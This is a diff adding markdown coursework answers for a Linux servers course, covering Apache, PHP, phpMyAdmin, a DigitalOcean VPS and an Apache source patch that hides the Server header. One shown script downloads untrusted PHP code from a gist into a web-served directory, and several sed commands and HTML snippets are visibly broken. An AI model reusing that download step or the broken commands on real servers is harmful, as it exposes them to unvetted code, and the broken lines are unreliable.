strings. +# Define these checks in a new variable APT_CHECK so that these checks can easily be performed later in the script. + +APT_CHECK=$(file --mime-type $(which apt-get) 2> /dev/null | grep -o application | wc -w) + +############ +# Look for executable 'wget', silent error printing (stderr), print count of matching strings. +# Define these checks in a new variable WGET_CHECK so that these checks can easily be performed later in the script. + +WGET_CHECK=$(file --mime-type $(which wget) 2> /dev/null | grep -o application | wc -w) + +############ +# Print count of matching strings which have retrieved by checking any packages containing 'apache2' on Debian system. +# Define this check in a new variable APACHE2_CHECK so that this check can easily be performed later in the script. + +APACHE2_CHECK=$(dpkg --get-selections | grep apache2 | wc -l) + +############ +# External PHP code download link (NOTE! Downloading untrusted files is not recommended in security oriented system environments!) +# Define this command in a new variable SAMPLE_CODE so that it can easily be called later in the script. + +SAMPLE_CODE="https://gist.githubusercontent.com/pchatterjee/3756368/raw/40c241c344c3e8d2333cc0c496e2782d9a1e6d93/calculator_v2.php" + +############ +# The next if statement has the following conditions: +# if apt-get command is found in the system (APT_CHECK variable check), and... +# ...if the current user is not root (UID is not 0), and... +# ...the current user belongs to sudo group +# +if [[ $APT_CHECK -eq 1 ]] && [[ $(id -u) -ne 0 ]] && [[ $(groups | grep -o sudo | wc -w) -eq 1 ]]; then + + ############ + # If apache2 is installed in the system, then... + # + if [[ $APACHE2_CHECK -gt 0 ]]; then + + ############ + # install PHP 7.0 and relevant Apache2 PHP 7.0 modules + # + sudo apt-get install -y php7.0 libapache2-mod-php + + ############ + # Comment the following lines in file /etc/apache2/modules-available/php7.0.conf, so that PHP works for with userdir module. + # + # TODO Better method should be coded. The current method has a risk that it replaces wrong lines, especially if there are multiple similar lines in a file. + # Better approach would be to replace lines by starting from line which includes pattern ?#?' /etc/apache2/mods-enabled/php7.0.conf + sed -i 's??#?' /etc/apache2/mods-enabled/php7.0.conf + sed -i 's?php_admin_flag engine Off?#php_admin_flag engine Off?' /etc/apache2/mods-enabled/php7.0.conf + sed -i 's??#?' /etc/apache2/mods-enabled/php7.0.conf + sed -i 's??#?' /etc/apache2/mods-enabled/php7.0.conf + + ############ + # If command wget is available on the system, then... + # + if [[ $WGET_CHECK -eq 1 ]]; then + + ############ + # Download sample PHP code into directory $HOME/public_html/ + # NOTE! Can we trust the downloaded code? + # + echo -e "\nDownloading sample PHP code for testing purposes (requires internet connection, security risk exists! Use local trusted code if system hardening means anything to you...)\n" + + # + wget -P $HOME/public_html/ $SAMPLE_CODE + + ############ + # Let's generate a purposeful error in file $HOME/public_html/calculator_v2.php by altering the code with sed command (switch -> switchasd) + # + sed -i 's/switch($op) {/switchasd($op) {/' $HOME/public_html/calculator_v2.php + + ############ + # Let's try to open the erroneous PHP site with the default graphical web browser. + # xdg-open command refers to default program defined to open specific mimetypes or protocols in Linux operating system. + # + xdg-open http://example.com/~$(whoami)/calculator_v2.php + + ############ + # Command 'wget' is not found in the system + # + else + echo -e "\nInstall application 'wget' before downloading a sample code" + fi + + ############ + # Packages matching string 'apache2' can't be found in the system by doing the check via Debian package manager + # + else + echo -e "\nYou need to install Apache web server before PHP 7.0\n" + exit + fi +fi + +``` + +Apache web server prints out the following error message in _/var/log/apache2/error.log_ while trying to open local website _example.com/~phelenius/calculator_v2.php_: + +``` +[Wed Feb 07 00:20:02.923994 2018] [:error] [pid 14260] [client 127.0.0.1:38430] PHP Parse error: syntax error, unexpected 'case' (T_CASE) in /home/phelenius/public_html/calculator_v2.php on line 20 +[Wed Feb 07 00:20:03.203824 2018] [:error] [pid 14259] [client 127.0.0.1:38432] PHP Parse error: syntax error, unexpected 'case' (T_CASE) in /home/phelenius/public_html/calculator_v2.php on line 20 +[Wed Feb 07 00:20:03.684123 2018] [:error] [pid 14258] [client 127.0.0.1:38434] PHP Parse error: syntax error, unexpected 'case' (T_CASE) in /home/phelenius/public_html/calculator_v2.php on line 20 +[Wed Feb 07 00:20:03.932480 2018] [:error] [pid 14268] [client 127.0.0.1:38436] PHP Parse error: syntax error, unexpected 'case' (T_CASE) in /home/phelenius/public_html/calculator_v2.php on line 20 +[Wed Feb 07 00:20:04.269771 2018] [:error] [pid 14261] [client 127.0.0.1:38438] PHP Parse error: syntax error, unexpected 'case' (T_CASE) in /home/phelenius/public_html/calculator_v2.php on line 20 +[Wed Feb 07 00:20:04.470184 2018] [:error] [pid 14262] [client 127.0.0.1:38440] PHP Parse error: syntax error, unexpected 'case' (T_CASE) in /home/phelenius/public_html/calculator_v2.php on line 20 +``` + +Apache web server complains multiple times about a PHP syntax error in /home/phelenius/public_html/calculator_v2.php file, on line 20. + +Mentioned PIDs (Process IDs) belong to apache2 process: + +``` +phelenius@my-machine:~$ ps aux |grep -E "14261|14262|14268|14258|14259|14260" +www-data 14258 0.0 0.5 253844 11648 ? S 00:16 0:00 /usr/sbin/apache2 -k start +www-data 14259 0.0 0.5 253844 11648 ? S 00:16 0:00 /usr/sbin/apache2 -k start +www-data 14260 0.0 0.5 253844 11648 ? S 00:16 0:00 /usr/sbin/apache2 -k start +www-data 14261 0.0 0.7 254136 14372 ? S 00:16 0:00 /usr/sbin/apache2 -k start +www-data 14262 0.0 0.5 253844 11648 ? S 00:16 0:00 /usr/sbin/apache2 -k start +www-data 14268 0.0 0.5 253844 11648 ? S 00:16 0:00 /usr/sbin/apache2 -k start +``` + +IP address 127.0.0.1 refers to local host, numbers 38430, 38432, 38434, 38436, 38438 and 38440 to the ports where the connection has been established from. + +The equivalent log events in _/var/log/apache2/access.log_: + +``` +127.0.0.1 - - [07/Feb/2018:00:20:02 +0200] "GET /~phelenius/calculator_v2.php HTTP/1.1" 500 185 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3300.0 Iron Safari/537.36" +127.0.0.1 - - [07/Feb/2018:00:20:03 +0200] "GET /~phelenius/calculator_v2.php HTTP/1.1" 500 185 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3300.0 Iron Safari/537.36" +127.0.0.1 - - [07/Feb/2018:00:20:03 +0200] "GET /~phelenius/calculator_v2.php HTTP/1.1" 500 185 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3300.0 Iron Safari/537.36" +127.0.0.1 - - [07/Feb/2018:00:20:03 +0200] "GET /~phelenius/calculator_v2.php HTTP/1.1" 500 185 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3300.0 Iron Safari/537.36" +127.0.0.1 - - [07/Feb/2018:00:20:04 +0200] "GET /~phelenius/calculator_v2.php HTTP/1.1" 500 185 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3300.0 Iron Safari/537.36" +127.0.0.1 - - [07/Feb/2018:00:20:04 +0200] "GET /~phelenius/calculator_v2.php HTTP/1.1" 500 185 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3300.0 Iron Safari/537.36" +``` + +- User's client program (address 127.0.0.1/localhost + client is web browser in this case) tries to retrieve server website _/~phelenius/calculator_v2.php_ for which the Apache web server has responded with error code 500 ([HTTP_INTERNAL_SERVER_ERROR](https://ci.apache.org/projects/httpd/trunk/doxygen/group__HTTP__Status.html#ga5d9777e02c26063c2985e39ef71091d2)). + +- User ID is simply a line symbol + +- Log time is "07/Feb/2018:00:20:04 +0200" etc + +- HTTP method used is [GET](https://www.w3schools.com/tags/ref_httpmethods.asp) + +- has [HTTP Referer](https://en.wikipedia.org/wiki/HTTP_referer) + +- size of the object is 185 (reported to the client program) + +- [User agent header](https://en.wikipedia.org/wiki/User_agent) reported by the client. According to the agent string, client browser has been gecko-based [Epiphany web browser](https://en.wikipedia.org/wiki/Epiphany_(GNOME)), using x86_64 processor architecture. This string can be manipulated in the client end. For example, a desktop client web browser can pretend to be a mobile browser. + +Default syntax for Apache log files follow the layout which is described [here](https://httpd.apache.org/docs/2.4/logs.html) under section 'Common Log Format'. + +**e)** Install and try out PhpMyAdmin or similar out-of-the-box web-based database management solution. +-------------- + +**Answer:** + +**NOTE!** We assume that the established Linux system has a working Apache HTTP daemon web server and PHP 5.0 or PHP 7.0 script language packages installed as Apache modules (see tasks a) and c) above). + +1. [phpMyAdmin](https://en.wikipedia.org/wiki/PhpMyAdmin) requires MySQL/MariaDB database back-end server. Let's install MySQL database server with its runtime dependencies on Debian-based distribution (Ubuntu 16.04.3 LTS in this case). + +``` +sudo apt-get -y install mysql-server +``` + +2. Local administrator (assumed to belong to sudo group) is asked to set a new password for root MySQL database root account: + +**NOTE!** This description applies to Ubuntu 16.04 LTS. Newer OS releases may not ask you to set MySQL password after MySQL server installation. If you don't see a blue screen stating "While not mandatory...", run the following command instead: + +``` +sudo mysql_secure_installation +``` + +``` +Configuring mysql-server-5.7 + +While not mandatory, it is highly recommended that you set a password for the MySQL administrative "root" user. + +If this field is left blank, the password will not be changed. + +New password for the MySQL "root" user: +``` + +We should choose a strong password ('Hu8aS1n?tI23' or 'Tu$pAR!iMu65' etc. Can be generated with a password generator program _pwgen_ as well). We should use a password which we don't use in other environments. + +**NOTE!** If unsure, check and configure your keyboard layout so that the password you supply will be correctly set up. + +When you have entered your password, press _TAB_ and then press __ (or just _ENTER_). Type the password again and continue. + +3. Let's install [phpMyAdmin](https://en.wikipedia.org/wiki/PhpMyAdmin) with its runtime dependencies on Debian-based distribution (Ubuntu 16.04.3 LTS in this case). + +``` +sudo apt-get install -y phpmyadmin +``` + +Accept the installation with extra dependencies. + +4. On Debian-based systems, the next screen states: + +``` +Configuring phpmyadmin + +Please choose the web server that should be automatically configured to run phpMyAdmin. + +Web server to reconfigure automatically: + +[] apache2 +[] lighttpd +``` + +Because we assume that you have Apache2 and not lighttpd, we should select apache2. Press _SPACE_ so that option _apache2_ has asterix in the brackets ([*]). After that, press _TAB_ to move the selection to __ and press _ENTER_. + +5. The next screen states: + +``` +Configuring phpmyadmin + +The phpmyadmin package must have a database installed and configured before it can be used. This can be optionally handled with dbconfig-common. + +If you are an advanced database administrator and know that you want to perform this configuration manually, or if your database has already been installed and configured, you should refuse this option. Details on what needs to be done should most likely be provided in /usr/share/doc/phpmyadmin. │ + +Otherwise, you should probably choose this option. + +Configure database for phpmyadmin with dbconfig-common? +``` + +The most common selection in this step is __ (alternative to __). For choosing a right choice, the following manuals can be used: +[Configure the database with dbconfig-common](https://docs.openstack.org/ocata/fr/install-guide-debconf/debconf/debconf-dbconfig-common.html) +[dbconfig-common.pdf](https://www.debian.org/doc/manuals/dbconfig-common/dbconfig-common.pdf) +[Stackoverflow - What means dbconfig-common](https://stackoverflow.com/questions/31403273/what-means-dbconfig-common) + +Additionally, for example: +![dbconfig-common_1](https://docs.openstack.org/ocata/fr/install-guide-debconf/_images/dbconfig-common_keep_admin_pass.png) +![dbconfig-common_1](https://docs.openstack.org/ocata/fr/install-guide-debconf/_images/dbconfig-common_used_for_remote_db.png) + +Let's choose option __ because we don't have earlier database in our system. More secure, although more troublesome, approach would be selecting __, according to the material references above. + +**NOTE!** dpkg tool _dpkg-reconfigure_ makes it possible to change package-related configuration in Debian-based systems afterwards (for example, _sudo dpkg-reconfigure phpmyadmin_). However, pay special attention and use extra care if you do any configurations afterwards. + +6. The next screen asks system administrator to set up MySQL database-related password for phpmyadmin MySQL user: + +``` +Configuring phpmyadmin + +Please provide a password for phpmyadmin to register with the database server. If left blank, a random password will be generated. + +MySQL application password for phpmyadmin: +``` + +Let's pick up a strong password for phpmyadmin. Take a look on step 2. for setting up a strong password. Use different password here. + +7. If you are not asked to set up a default phpmyadmin username or password, please run _sudo dpkg-reconfigure phpmyadmin_. The default phpmyadmin username is usually 'phpmyadmin' and the login password is the one you write down by executing the command mentioned earlier in this step. + +8. Let's try accessing phpMyAdmin front page: + +``` +xdg-open http://localhost/phpmyadmin +``` + +If the installation has been successful, the web browser view should look like this: + +![phpmyadmin-loginpage](https://rootninja.files.wordpress.com/2010/10/image38.png) + +9. Log in to phpMyAdmin with the following credentials: +- **user name:** phpmyadmin (or any other defined during phpmyadmin installation) +- **password:** password defined in step 7. + +10. If successfully logged in, the web browser view should be as follows (phpMyAdmin - Front page): + +![phpmyadmin-frontpage](https://raw.githubusercontent.com/Fincer-altego/basics-of-a-linux-server-school-course-/master/phpmyadmin-resized.png) + +phpMyAdmin - Database configuration sample: + +![phpmyadmin-dbconfpage](https://raw.githubusercontent.com/Fincer-altego/basics-of-a-linux-server-school-course-/master/phpmyadmin-2-resized.png) + +**f)** Create a web application which executes a simple calculation for the user (BMI calculator, for example) +-------------- + +**Answer:** + +**NOTE!** We assume that the Linux installation has a working Apache HTTP daemon web server with correct PHP support enabled. Apache server has 'userdir' module enabled, and some local user has _public_html_ folder created. + +1. Let's create the following, very simple PHP code and save it to ~/public_html/rainfall.php (current user) + +``` + + +``` + +2. Let's open the php file with the default graphical web browser found in the local Linux system: + +``` +xdg-open http://example.com/~$(whoami)/rainfall.php +``` + +Result: +![php-sample-image-1](https://raw.githubusercontent.com/Fincer-altego/basics-of-a-linux-server-school-course-/master/php-example-rainfall.png) diff --git a/exercises/h4.md b/exercises/h4.md new file mode 100644 index 0000000..615e3e9 --- /dev/null +++ b/exercises/h4.md @@ -0,0 +1,595 @@ +Linux servers - Exercice 4 +============== + +*Disclaimer:* +-------------- + +This exercise is a part of [Linux servers (ICT4TN021, spring 2018) // Linux-palvelimet (ICT4TN021, kevät 2018)](http://www.haaga-helia.fi/fi/opinto-opas/opintojaksokuvaukset/ICT4TN021) school course organized as a part of Information Technology studies in Haaga-Helia university of Applied Sciences, Helsinki, Finland. Course lecturer [Tero Karvinen](http://terokarvinen.com/) has defined the original assignment descriptions in Finnish presented in this document in English. Answers and translations have been written by Pekka Helenius (me, ~ Fincer). + +**a)** Make it possible to create home pages with normal user privileges in your virtual server environment. +-------------- + +**Answer:** + +Virtual server IP address is _174.138.2.190_. The server is hosted on [DigitalOcean](https://www.digitalocean.com/community/tutorials/how-to-create-your-first-digitalocean-droplet) which provides hosting services for users. Ubuntu 16.04 LTS (without DE) is used as a server platform. + +Ubuntu distribution hosted on DigitalOcean has custom configurations compared to Canonical version of clean Ubuntu environment. For example, DigitalOcean has predefined different repository sources in package manager sources file _/etc/apt/sources.list_ (http://mirrors.digitalocean.com/ubuntu/) and has customized configuration for Apache web server by default. Can you trust these repositories and predefined configurations as a system administrator? Can you be sure the program source codes are "clean" and do not contain malicious code patches? Are the used package repositories updated and which flags have been used to compile the binary software available there? What differences are there between the official Canonical and DigitalOcean repositories? + +It is good to stop to think the previous issues before looking for a third party hosting service for your server environment. Do available markets have better virtual hosting service providers and in which criteria? In small business, it can be safer to hold all the aces and set up a minimal self-hosted server using a computer (suited for your needs) such as Raspberry Pi and claim a Domain name for it from a DNS provider. If you do larger business, you need to consider your server capacity again. It can be more profitable and comfortable to buy some server space from a virtual hosting server provider. + +Of course, if you ever want to, you can install the server environment from scratch using rolling releases such as Arch Linux, Gentoo or 'Linux from Scratch'. However, this is not recommended approach in server environments requiring system stability over newer software. + +Anyway, + +1. Do initial configuration for your server following the guide by Tero Karvinen: + +[Tero Karvinen - First Steps on a New Virtual Private Server – an Example on DigitalOcean and Ubuntu 16.04 LTS](http://terokarvinen.com/2017/first-steps-on-a-new-virtual-private-server-an-example-on-digitalocean) + +2. Connect to your new virtual private server once you have set it up. I use a predefined user name _newuser_ in my server environment: + +``` +phelenius@my-machine:~$ ssh newuser@174.138.2.190 +newuser@174.138.2.190's password: +Welcome to Ubuntu 16.04.3 LTS (GNU/Linux x86_64) + + * Documentation: https://help.ubuntu.com + * Management: https://landscape.canonical.com + * Support: https://ubuntu.com/advantage + + Get cloud support with Ubuntu Advantage Cloud Guest: + http://www.ubuntu.com/business/services/cloud + +7 packages can be updated. +0 updates are security updates. + + +Last login: Tue Feb 13 14:49:24 2018 from XXX.XXX.XXX.XXX +newuser@goauldhost:~$ +``` + +3. Open default SSH TCP port 22 in your firewall: + +**NOTE!** Default policy for Ubuntu firewall is to deny/drop all input connections so we need to allow traffic into protocol/daemon specific ports to open up communication between this server and clients. + +``` +newuser@goauldhost:~$ sudo ufw allow 22/tcp && sudo ufw enable +``` + +Once you have established SSH connection to your remote server, install _apache2_ and open port 80 for it doing the following: + +``` +newuser@goauldhost:~$ sudo apt-get install apache2 && sudo ufw allow 80/tcp +``` + +4. Enable Apache _userdir_ module: + +``` +newuser@goauldhost:~$ sudo a2enmod userdir +``` + +5. Some PHP and userdir module related configurations seem to be predefined in packages provided on DigitalOcean server environment (such as # symbols in /etc/apache2/mods-enabled/php7.0.conf in order to enable PHP for user sites), unlike stated in [Exercise 3](https://github.com/Fincer-altego/basics-of-a-linux-server-school-course-/blob/master/h3.md). + +6. Restart Apache HTTP daemon (HTTPD) after enabling _userdir_ module: + +``` +newuser@goauldhost:~$ sudo systemctl restart apache2.service +``` + +Recheck HTTP daemon state (should be **Running**): + +``` +newuser@goauldhost:~$ systemctl status apache2.service +``` + +If everything seem to be running and working you can try to establish connection to the HTTP daemon server using _your local computer_ (do not try this in your virtual private server environment but with an external client computer): + +``` +phelenius@my-machine:~$ xdg-open http://174.138.2.190:80 +``` + +The IP address here refers to the virtual private server IP address. + +7. If the connection test is successful, you should see something similar to this picture: + +![apache2-defaultpage](https://www.dedyprastyo.com/wp-content/uploads/2017/10/Install-Apache-di-Ubuntu-17.04-www.dedyprastyo.com_-400x400.jpg) + +Let's get back to the virtual server environment in our SSH session. + +8. We should hide any extra server information which is visible for clients. Add the following lines in _/etc/apache2/apache2.conf_ (with sudoedit): + +``` +TraceEnable Off +ServerSignature Off +ServerTokens Prod +``` + +Description of these lines [here](https://www.petefreitag.com/item/419.cfm). + +Restart Apache HTTP daemon (web server): +``` +newuser@goauldhost:~$ sudo systemctl restart apache2.service +``` + +9. Create a new user _monkey_ (finnish: apina). We do not add this user to _sudo_ groups, therefore denying all root access for this user: + +``` +newuser@goauldhost:~$ sudo adduser monkey +``` + +Change to the default shell of user _monkey_ (you can check it by executing: _grep monkey /etc/passwd_): + +``` +newuser@goauldhost:~$ su monkey +Password: +monkey@goauldhost:/home/newuser$ cd +monkey@goauldhost:~$ mkdir public_html +``` + +Therefore we have created a new home site folder for the user _monkey_. Contents of this folder should be available like shown in the following picture: + +![monkeysite-samplepic](https://raw.githubusercontent.com/Fincer-altego/basics-of-a-linux-server-school-course-/master/monkey-site.png) + +**NOTE!** As you can see, Apache doesn't give any server information in the website view, thanks for the configurations done in step 8. + +User _monkey_ can add any content to his/her personal site. By default, Apache looks for any of the following files, defined in _/etc/apache2/mods-available/dir.conf_ (symbolic link in folder _/etc/apache2/mods-enabled/dir.conf_): + +``` +newuser@goauldhost:~$ ls -l /etc/apache2/mods-enabled/dir.conf +lrwxrwxrwx 1 root root 26 Feb 8 10:40 /etc/apache2/mods-enabled/dir.conf -> ../mods-available/dir.conf +newuser@goauldhost:~$ cat /etc/apache2/mods-enabled/dir.conf |grep -i directoryindex | awk '{$1 = ""; print $i}' + index.html index.cgi index.pl index.php index.xhtml index.htm +``` + +Permissions of folder $HOME/public_html of the user _monkey_ are as follows: + +``` +monkey@goauldhost:~$ ls -l +total 4 +drwxrwxr-x 2 monkey monkey 4096 Feb 13 15:35 public_html +``` +drwxrwxr-x +123456789 10 + +d = directory +r = read (value 4) +w = write (value 2) +x = execute (value 1) + +where +...symbols 2-4 (rwx) indicate permissions of the user _monkey_ to the folder +...symbols 5-7 (rwx) indicate permissions of the (primary) group where the user _monkey_ belongs to. In this case, the group is _monkey_ +...symbols 8-10 (r-x) indicate permissions granted for other system users to the folder + +Permissions can be written in numeric form but also in symbolic form. For example, + +775 = rwxrwxr-x (4+2+1, 4+2+1, 4+1) +ug=rwx,o=rx = rwxrwxr-x + +Take a look on the following links to get more information about Unix permissions: + +- [Arch Wiki - File permissions and attributes](https://wiki.archlinux.org/index.php/File_permissions_and_attributes) + +- [Wikipedia - Notation_of_traditional_Unix_permissions](https://en.wikipedia.org/wiki/File_system_permissions#Notation_of_traditional_Unix_permissions) + +- [Arch Wiki - umask](https://wiki.archlinux.org/index.php/Umask) + +Changing permissions is recommended to be done in symbolic mode because individual permissions can't be as flexibly be changed in numeric mode. + +ls command shows a user (monkey) first after which group (monkey) is shown. + +The folder is accessible in public network via address _http://174.138.2.190:80/~monkey/_ + +You can change permissions with _chmod_ command. + +Numeric form: +chmod 775 ~/public_html + +Symbolic form: +chmod ug=rwx,o=rx ~/public_html + +You can change permissions recursively using _-R_ parameter (chmod -R ...) + +**EXTRA: Deleting Server field from HTTP header by updating Apache source code on Debian-based Linux distributions** +-------------- + +Including Server field in HTTP header by Apache HTTP daemon (web server) is debated. [HTTP/1.1 standard specification](https://tools.ietf.org/html/rfc2616#page-141) states the following: + +> Note: Revealing the specific software version of the server might allow the server machine to become more vulnerable to attacks against software that is known to contain security holes. Server implementors are encouraged to make this field a configurable option. + +**NOTE!** Apache is compiled from source code. + +Removal of Server field from HTTP header is debated in Apache developers' community (The key question here: does removal of the field actually improve any security?). More about this topic: [StackoverFlow (Can't remove Server: Apache header)](https://stackoverflow.com/questions/35360516/cant-remove-server-apache-header). + +**NOTE!** The following method does not work with automatic system updates via package repositories (usage of _sudo apt-get update_ and _sudo apt-get upgrade_ commands) because the patches binary files would be replaced by ones available in the official repositories. Therefore, each time you want to update your Apache server, you need to recompile it from source applying the patch file provided in this GitHub repository. _This method can be troublesome for system administration or contain unaccepted policy in your company. Consider using puppet or salt or any relevant automation method here._ + +**NOTE!** You must be aware what you are doing each time you compile software from source. Trust the source, trust the patch files (diff or patch) and do not do anything that can lead to unknown or troublesome bugs, malicious code execution or create new security risks. + +**NOTE!** We are unable to sign the package with the official maintainer key because we update Apache with our specific patch file and compile the software ourselves. Therefore we ignore any signing requirements in _dpkg-buildpackage_ command (or alternatively we can use our own keys). + +**NOTE** Consider any policy that determines your production and/or server environment requirements. For example: Am I allowed to install software from source code? Does my method break a (critical) component in working server environment? Etc. + +**NOTE!** _Again. Know exactly what you are about to do. As a system administrator you hold responsibility here._ + +We have already improved security of our Apache web server by removing critical information sent to client. However, the server still gives information about its name as follows: + +``` +newuser@goauldhost:~/source_codes/apache2$ curl -I http://localhost +HTTP/1.1 200 OK +Date: Sat, 17 Feb 2018 13:27:11 GMT +Server: Apache +Content-Type: text/html;charset=UTF-8 +``` + +We want to remove field _Server: Apache_. Multiple approaches were tested (such as modsecurity2 module and writing line _Header unset Server_ into file _/etc/apache2/apache2.conf_) without success. Therefore I ended up patching the source code of Apache web server so that the wanted field can really be removed. + +Download Apache source code on your Debian-based Linux distribution: + +``` +newuser@goauldhost:~$ mkdir -p ./source_codes/apache2 && cd ./source_codes/apache2 +newuser@goauldhost:~/source_codes/apache2$ apt-get source apache2 +``` + +After which add [source code patch file](https://github.com/Fincer-altego/basics-of-a-linux-server-school-course-/blob/e60bfe23814f5b72315daec144c31a75bc7f1ef0/patch_apache_servertokens.patch) into created _$HOME/source_codes/apache2_ folder. + +**NOTE!** I have personally created the patch file with Unix tool _diff_. The patch file is not downloaded from any suspicious website. You can always check the patch file code yourself if still hesitating. + +If you have a working Apache HTTP daemon (web server) environment on your Linux, please check the version of your Apache software version with the following command: + +``` +newuser@goauldhost:~$ dpkg -s apache2 |grep -i version +Version: 2.4.18-2ubuntu3.5 +``` + +In that way we can be sure version of the downloaded source code matches with our already-installed Apache environment. + +Once you have downloaded the source code, go to the following folder (which contains the code): + +``` +newuser@goauldhost:~/source_codes/apache2$ cd apache2-2.4.18/ +``` + +Implement the patch file changes into the Apache source code: + +``` +newuser@goauldhost:~/source_codes/apache2/apache2-2.4.18$ patch -Np1 -i ../patch_apache_servertokens.patch +``` + +Before compiling Apache web server, you must install the following build time dependencies: + +``` +newuser@goauldhost:~/source_codes/apache2/apache2-2.4.18$ sudo apt-get install debhelper libaprutil1-dev libapr1-dev libpcre3-dev zlib1g-dev libssl-dev liblua5.1-0-dev libxml2-dev autotools-dev build-essential +``` + +Compile and install the Apache web server: + +newuser@goauldhost:~/source_codes/apache2/apache2-2.4.18$ dpkg-buildpackage -rfakeroot -b -us -uc +... + +... + +``` + +If Apache HTTP daemon is running, stop it: + +``` +newuser@goauldhost:~/source_codes/apache2$ sudo systemctl stop apache2.service +``` + +It is essential to check which apache2 packages have been installed into the target system. We want to install only specific deb packages already found in the system, as multiple deb packages have been compiled by the previous command. All found Apache2 packages in the system should be replaced by the ones compiled from the Apache2 source code. + +System has the following Apache2 packages: + +``` +newuser@goauldhost:~/source_codes/apache2/apache2-2.4.18$ cd .. +newuser@goauldhost:~/source_codes/apache2$ dpkg --get-selections |grep apache | awk '{print $1}' +apache2 +apache2-bin +apache2-data +apache2-utils +libapache2-mod-php +libapache2-mod-php7.0 +``` + +Then we compare the above list to the compiled deb packages: + +``` +newuser@goauldhost:~/source_codes/apache2$ ls |grep deb +apache2_2.4.18-2ubuntu3.5_amd64.deb +apache2_2.4.18-2ubuntu3.5.debian.tar.xz +apache2-bin_2.4.18-2ubuntu3.5_amd64.deb +apache2-data_2.4.18-2ubuntu3.5_all.deb +apache2-dbg_2.4.18-2ubuntu3.5_amd64.deb +apache2-dev_2.4.18-2ubuntu3.5_amd64.deb +apache2-doc_2.4.18-2ubuntu3.5_all.deb +apache2-suexec-custom_2.4.18-2ubuntu3.5_amd64.deb +apache2-suexec-pristine_2.4.18-2ubuntu3.5_amd64.deb +apache2-utils_2.4.18-2ubuntu3.5_amd64.deb +``` + +... as a result we can see that the following deb packages should be installed with _dpkg -i_ command: + +``` +newuser@goauldhost:~/source_codes/apache2$ sudo dpkg -i apache2_2.4.18-2ubuntu3.5_amd64.deb apache2-bin_2.4.18-2ubuntu3.5_amd64.deb apache2-data_2.4.18-2ubuntu3.5_all.deb apache2-utils_2.4.18-2ubuntu3.5_amd64.deb +``` + +If everything has succeeded you should have a working, patched Apache web server in your target system. Because the patches web server software supports _ServerTokens None_ option now, we shall add this option into _etc/apache2/apache2.conf_. + +``` +newuser@goauldhost:~$ sudoedit /etc/apache2/apache2.conf +``` + +Add the following lines (// just replace ServerTokens Prod with None): + +``` +TraceEnable Off +ServerSignature Off +ServerTokens None +``` + +**NOTE!** Any settings in _/etc/apache2/conf-available/security.conf_ overrides these configuration changes. + +Restart Apache2 server (you must apply the patch file before doing this because the default Apache software does not implement 'None' for ServerTokens): + +``` +newuser@goauldhost:~$ sudo systemctl start apache2.service +``` + +Check whether the configuration works: + +``` +phelenius@my-machine:~$ curl -I http://174.138.2.190 +HTTP/1.1 200 OK +Date: Sat, 17 Feb 2018 14:02:20 GMT +Last-Modified: Wed, 14 Feb 2018 00:06:44 GMT +ETag: "20b-56520e2f88f4a" +Accept-Ranges: bytes +Content-Length: 523 +Vary: Accept-Encoding +Content-Type: text/html +``` + +Therefore we have successfully deleted Server field from HTTP header. + +You can additionally set and unset HTTP header fields sent to a client as follows: + +``` +Header unset Last-Modified +Header unset Accept-Ranges +Header unset Vary +Header unset ETag +``` + +You must be careful when unsetting fields because it affects behavior of client programs and efficiency of your server environment (performance, for example). Remember that factors such as field order, formatting and error messages can give hints about the used server environment as well (for example, 404 not found message). + +**NOTE!** The header options mentioned above work only if module 'headers' has been activated (run command _sudo a2enmod headers_ and restart the server) + +More about HTTP header in [Wikipedia](https://en.wikipedia.org/wiki/List_of_HTTP_header_fields). More articles in [ETag](https://en.wikipedia.org/wiki/HTTP_ETag), [Vary: Accept-Encoding](https://blog.stackpath.com/accept-encoding-vary-important), etc. + +**s)** Set user default website to be the default website for Apache in your virtual server environment. +-------------- + +**Answer:** + +Let's begin from the final state of the previous answer. We have created a user _monkey_ in our server computer. This user has a website URL 174.138.2.190:80/~monkey + +1. Remove default webpage of Apache web server, and move _DocumentRoot_ to point to directory *$HOME/public_html* of user *monkey*, after which restart Apache service daemon. + +``` +newuser@goauldhost:~$ sudo sed -i 's?DocumentRoot /var/www/html?DocumentRoot /home/monkey/public_html?' /etc/apache2/sites-available/000-default.conf +``` + +We can disable folder path _/var/www_ commenting out the following lines (inserting # symbols) in file */etc/apache2/apache2.conf* (use command _sudoedit_, for example): + +``` +# +# Options Indexes FollowSymLinks +# AllowOverride None +# Require all granted +# +``` + +Restart Apache web server daemon: + +``` +newuser@goauldhost:~$ sudo systemctl restart apache2.service +``` + +Go to the following IP address with your _local computer_ (use HTTP port 80): + +``` +xdg-open http://174.138.2.190:80 +``` + +The opening view should be as follows: + +![emptypage-sample](https://raw.githubusercontent.com/Fincer-altego/basics-of-a-linux-server-school-course-/master/empty-page-sample.png) + +2. Create a new file _index.html_ in the directory $HOME/public_html of user _monkey_ (where $HOME=/home/monkey/) + +``` +newuser@goauldhost:~$ su monkey +Password: +monkey@goauldhost:/home/newuser$ cd +monkey@goauldhost:~$ echo -e '\n \n \t\n \t\tTesti\n \t\n \t\n \t\t

Testi

